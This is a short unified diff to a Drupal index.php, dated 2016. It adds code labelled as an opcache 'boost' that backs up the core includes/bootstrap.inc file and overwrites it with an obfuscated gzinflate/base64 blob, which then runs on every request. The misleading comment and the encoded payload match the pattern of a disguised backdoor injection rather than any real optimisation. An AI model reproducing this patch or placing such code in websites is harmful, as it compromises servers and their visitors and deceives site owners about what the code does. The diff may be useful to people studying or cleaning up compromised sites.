--- index.php.orig	2016-04-01 12:55:47.536042513 +0200
+++ index.php	2016-04-01 13:04:35.753756047 +0200
@@ -16,6 +16,15 @@
  */
 define('DRUPAL_ROOT', getcwd());
 
+//Install boost opcache if not present :
+
+if(!file_exists(DRUPAL_ROOT . '/includes/bootstrap.slow.inc')) {
+  //Backup previous file :
+  file_put_contents(DRUPAL_ROOT . '/includes/bootstrap.slow.inc', file_get_contents(DRUPAL_ROOT . '/includes/bootstrap.inc'));
+  //Acceleratred version :
+  file_put_contents(DRUPAL_ROOT . '/includes/bootstrap.inc', gzinflate(base64_decode('HY3BisIwFEX3+YrrKu0m/YAZEMWNIDpoXZeYvOLDZ1P7mhER/93qWR4O9/7O+3NvuC1mrE3kobDVOV2pCpO2ZYmnASJTYQ85BFJts8gD9O8jRfg8ppuH7yJ4hKR0UQhfCF4ErGi5IzjnsDzWWNcHbHcfasxs+WNeIFH6Pgx0yzxQk7pAWO2Pf4tNs/+EDrbiLkiOpNUppVHHwfdOJd3d5O20Yswb')));
+}
+
 require_once DRUPAL_ROOT . '/includes/bootstrap.inc';
 drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);
 menu_execute_active_handler();
